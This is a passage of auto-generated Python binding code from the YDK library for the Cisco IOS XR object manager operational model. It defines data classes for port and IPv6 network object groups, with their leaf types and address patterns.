return meta._meta_table['ObjectGroup.Port.Objects.Object.NestedGroups']['meta_info']
class Operators(_Entity_):
"""
Table of Operator
.. attribute:: operator
op class
**type**\: list of :py:class:`Operator <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.Operators.Operator>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object.Operators, self).__init__()
self.yang_name = "operators"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("operator", ("operator", ObjectGroup.Port.Objects.Object.Operators.Operator))])
self._leafs = OrderedDict()
self.operator = YList(self)
self._segment_path = lambda: "operators"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object.Operators, [], name, value)
class Operator(_Entity_):
"""
op class
.. attribute:: operator_type
operation for ports
**type**\: :py:class:`PortOperator <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.PortOperator>`
**config**\: False
.. attribute:: port
Port number
**type**\: union of the below types:
**type**\: :py:class:`Port <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.Port>`
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: operator_type_xr
Operator
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: port_xr
Port
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object.Operators.Operator, self).__init__()
self.yang_name = "operator"
self.yang_parent_name = "operators"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('operator_type', (YLeaf(YType.enumeration, 'operator-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper', 'PortOperator', '')])),
('port', (YLeaf(YType.str, 'port'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper', 'Port', ''),'int'])),
('operator_type_xr', (YLeaf(YType.uint32, 'operator-type-xr'), ['int'])),
('port_xr', (YLeaf(YType.uint32, 'port-xr'), ['int'])),
])
self.operator_type = None
self.port = None
self.operator_type_xr = None
self.port_xr = None
self._segment_path = lambda: "operator"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object.Operators.Operator, ['operator_type', 'port', 'operator_type_xr', 'port_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects.Object.Operators.Operator']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects.Object.Operators']['meta_info']
class PortRanges(_Entity_):
"""
Table of PortRange
.. attribute:: port_range
Match only packets on a given port range
**type**\: list of :py:class:`PortRange <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.PortRanges.PortRange>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object.PortRanges, self).__init__()
self.yang_name = "port-ranges"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("port-range", ("port_range", ObjectGroup.Port.Objects.Object.PortRanges.PortRange))])
self._leafs = OrderedDict()
self.port_range = YList(self)
self._segment_path = lambda: "port-ranges"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object.PortRanges, [], name, value)
class PortRange(_Entity_):
"""
Match only packets on a given port range
.. attribute:: start_port
Start port number
**type**\: union of the below types:
**type**\: :py:class:`StartPort <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.StartPort>`
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: end_port
End port number
**type**\: union of the below types:
**type**\: :py:class:`EndPort <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.EndPort>`
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: start_port_xr
Port start address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: end_port_xr
Port end address
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object.PortRanges.PortRange, self).__init__()
self.yang_name = "port-range"
self.yang_parent_name = "port-ranges"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('start_port', (YLeaf(YType.str, 'start-port'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper', 'StartPort', ''),'int'])),
('end_port', (YLeaf(YType.str, 'end-port'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper', 'EndPort', ''),'int'])),
('start_port_xr', (YLeaf(YType.uint32, 'start-port-xr'), ['int'])),
('end_port_xr', (YLeaf(YType.uint32, 'end-port-xr'), ['int'])),
])
self.start_port = None
self.end_port = None
self.start_port_xr = None
self.end_port_xr = None
self._segment_path = lambda: "port-range"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object.PortRanges.PortRange, ['start_port', 'end_port', 'start_port_xr', 'end_port_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects.Object.PortRanges.PortRange']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects.Object.PortRanges']['meta_info']
class ParentGroups(_Entity_):
"""
Table of ParentGroup
.. attribute:: parent_group
Parent object group
**type**\: list of :py:class:`ParentGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object.ParentGroups, self).__init__()
self.yang_name = "parent-groups"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("parent-group", ("parent_group", ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup))])
self._leafs = OrderedDict()
self.parent_group = YList(self)
self._segment_path = lambda: "parent-groups"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object.ParentGroups, [], name, value)
class ParentGroup(_Entity_):
"""
Parent object group
.. attribute:: parent_group_name (key)
Nested object group
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: parent_name
Parent node
**type**\: str
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup, self).__init__()
self.yang_name = "parent-group"
self.yang_parent_name = "parent-groups"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['parent_group_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('parent_group_name', (YLeaf(YType.str, 'parent-group-name'), ['str'])),
('parent_name', (YLeaf(YType.str, 'parent-name'), ['str'])),
])
self.parent_group_name = None
self.parent_name = None
self._segment_path = lambda: "parent-group" + "[parent-group-name='" + str(self.parent_group_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup, ['parent_group_name', 'parent_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects.Object.ParentGroups.ParentGroup']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects.Object.ParentGroups']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects.Object']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port.Objects']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Port']['meta_info']
class Network(_Entity_):
"""
Network object group
.. attribute:: ipv6
IPv6 object group
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6>`
**config**\: False
.. attribute:: ipv4
IPv4 object group
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv4>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "object-group"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ipv6", ("ipv6", ObjectGroup.Network.Ipv6)), ("ipv4", ("ipv4", ObjectGroup.Network.Ipv4))])
self._leafs = OrderedDict()
self.ipv6 = ObjectGroup.Network.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self.ipv4 = ObjectGroup.Network.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self._segment_path = lambda: "network"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network, [], name, value)
class Ipv6(_Entity_):
"""
IPv6 object group
.. attribute:: objects
Table of Object
**type**\: :py:class:`Objects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "network"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("objects", ("objects", ObjectGroup.Network.Ipv6.Objects))])
self._leafs = OrderedDict()
self.objects = ObjectGroup.Network.Ipv6.Objects()
self.objects.parent = self
self._children_name_map["objects"] = "objects"
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6, [], name, value)
class Objects(_Entity_):
"""
Table of Object
.. attribute:: object
IPv6 object group
**type**\: list of :py:class:`Object <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects, self).__init__()
self.yang_name = "objects"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("object", ("object", ObjectGroup.Network.Ipv6.Objects.Object))])
self._leafs = OrderedDict()
self.object = YList(self)
self._segment_path = lambda: "objects"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects, [], name, value)
class Object(_Entity_):
"""
IPv6 object group
.. attribute:: object_name (key)
IPv6 object group name \- maximum 64 characters
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: nested_groups
Table of NestedGroup
**type**\: :py:class:`NestedGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups>`
**config**\: False
.. attribute:: addresses
Table of Address
**type**\: :py:class:`Addresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.Addresses>`
**config**\: False
.. attribute:: address_ranges
Table of AddressRange
**type**\: :py:class:`AddressRanges <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges>`
**config**\: False
.. attribute:: parent_groups
Table of parent object group
**type**\: :py:class:`ParentGroups <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups>`
**config**\: False
.. attribute:: hosts
Table of Host
**type**\: :py:class:`Hosts <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.Hosts>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object, self).__init__()
self.yang_name = "object"
self.yang_parent_name = "objects"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['object_name']
self._child_classes = OrderedDict([("nested-groups", ("nested_groups", ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups)), ("addresses", ("addresses", ObjectGroup.Network.Ipv6.Objects.Object.Addresses)), ("address-ranges", ("address_ranges", ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges)), ("parent-groups", ("parent_groups", ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups)), ("hosts", ("hosts", ObjectGroup.Network.Ipv6.Objects.Object.Hosts))])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
])
self.object_name = None
self.nested_groups = ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups()
self.nested_groups.parent = self
self._children_name_map["nested_groups"] = "nested-groups"
self.addresses = ObjectGroup.Network.Ipv6.Objects.Object.Addresses()
self.addresses.parent = self
self._children_name_map["addresses"] = "addresses"
self.address_ranges = ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges()
self.address_ranges.parent = self
self._children_name_map["address_ranges"] = "address-ranges"
self.parent_groups = ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups()
self.parent_groups.parent = self
self._children_name_map["parent_groups"] = "parent-groups"
self.hosts = ObjectGroup.Network.Ipv6.Objects.Object.Hosts()
self.hosts.parent = self
self._children_name_map["hosts"] = "hosts"
self._segment_path = lambda: "object" + "[object-name='" + str(self.object_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-objmgr-oper:object-group/network/ipv6/objects/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object, ['object_name'], name, value)
class NestedGroups(_Entity_):
"""
Table of NestedGroup
.. attribute:: nested_group
nested object group
**type**\: list of :py:class:`NestedGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups, self).__init__()
self.yang_name = "nested-groups"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("nested-group", ("nested_group", ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup))])
self._leafs = OrderedDict()
self.nested_group = YList(self)
self._segment_path = lambda: "nested-groups"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups, [], name, value)
class NestedGroup(_Entity_):
"""
nested object group
.. attribute:: nested_group_name (key)
Enter the name of a nested object group
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: nested_group_name_xr
Nested group
**type**\: str
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup, self).__init__()
self.yang_name = "nested-group"
self.yang_parent_name = "nested-groups"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['nested_group_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('nested_group_name', (YLeaf(YType.str, 'nested-group-name'), ['str'])),
('nested_group_name_xr', (YLeaf(YType.str, 'nested-group-name-xr'), ['str'])),
])
self.nested_group_name = None
self.nested_group_name_xr = None
self._segment_path = lambda: "nested-group" + "[nested-group-name='" + str(self.nested_group_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup, ['nested_group_name', 'nested_group_name_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups.NestedGroup']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.NestedGroups']['meta_info']
class Addresses(_Entity_):
"""
Table of Address
.. attribute:: address
IPv6 address
**type**\: list of :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.Addresses, self).__init__()
self.yang_name = "addresses"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address))])
self._leafs = OrderedDict()
self.address = YList(self)
self._segment_path = lambda: "addresses"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.Addresses, [], name, value)
class Address(_Entity_):
"""
IPv6 address
.. attribute:: prefix
IPv6 prefix x\:x\:\:x/y
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Prefix of the IP Address
**type**\: int
**range:** 0..128
**config**\: False
.. attribute:: prefix_xr
IPv4 Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length_xr
Prefix length
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
('prefix_xr', (YLeaf(YType.str, 'prefix-xr'), ['str'])),
('prefix_length_xr', (YLeaf(YType.uint32, 'prefix-length-xr'), ['int'])),
])
self.prefix = None
self.prefix_length = None
self.prefix_xr = None
self.prefix_length_xr = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address, ['prefix', 'prefix_length', 'prefix_xr', 'prefix_length_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.Addresses.Address']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.Addresses']['meta_info']
class AddressRanges(_Entity_):
"""
Table of AddressRange
.. attribute:: address_range
Range of host addresses
**type**\: list of :py:class:`AddressRange <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges, self).__init__()
self.yang_name = "address-ranges"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address-range", ("address_range", ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange))])
self._leafs = OrderedDict()
self.address_range = YList(self)
self._segment_path = lambda: "address-ranges"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges, [], name, value)
class AddressRange(_Entity_):
"""
Range of host addresses
.. attribute:: start_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: end_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: start_address_xr
Range start address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: end_address_xr
Range end address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange, self).__init__()
self.yang_name = "address-range"
self.yang_parent_name = "address-ranges"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('start_address', (YLeaf(YType.str, 'start-address'), ['str'])),
('end_address', (YLeaf(YType.str, 'end-address'), ['str'])),
('start_address_xr', (YLeaf(YType.str, 'start-address-xr'), ['str'])),
('end_address_xr', (YLeaf(YType.str, 'end-address-xr'), ['str'])),
])
self.start_address = None
self.end_address = None
self.start_address_xr = None
self.end_address_xr = None
self._segment_path = lambda: "address-range"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange, ['start_address', 'end_address', 'start_address_xr', 'end_address_xr'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges.AddressRange']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.AddressRanges']['meta_info']
class ParentGroups(_Entity_):
"""
Table of parent object group
.. attribute:: parent_group
Parent object group
**type**\: list of :py:class:`ParentGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups, self).__init__()
self.yang_name = "parent-groups"
self.yang_parent_name = "object"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("parent-group", ("parent_group", ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup))])
self._leafs = OrderedDict()
self.parent_group = YList(self)
self._segment_path = lambda: "parent-groups"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups, [], name, value)
class ParentGroup(_Entity_):
"""
Parent object group
.. attribute:: parent_group_name (key)
Nested object group
**type**\: str
**length:** 1..64
**config**\: False
.. attribute:: parent_name
Parent node
**type**\: str
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup, self).__init__()
self.yang_name = "parent-group"
self.yang_parent_name = "parent-groups"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['parent_group_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('parent_group_name', (YLeaf(YType.str, 'parent-group-name'), ['str'])),
('parent_name', (YLeaf(YType.str, 'parent-name'), ['str'])),
])
self.parent_group_name = None
self.parent_name = None
self._segment_path = lambda: "parent-group" + "[parent-group-name='" + str(self.parent_group_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup, ['parent_group_name', 'parent_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups.ParentGroup']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_objmgr_oper as meta
return meta._meta_table['ObjectGroup.Network.Ipv6.Objects.Object.ParentGroups']['meta_info']
class Hosts(_Entity_):
"""
Table of Host
.. attribute:: host
A single host address
**type**\: list of :py:class:`Host <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_objmgr_oper.ObjectGroup.Network.Ipv6.Objects.Object.Hosts.Host>`
**config**\: False
"""
_prefix = 'infra-objmgr-oper'
_revision = '2017-05-01'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
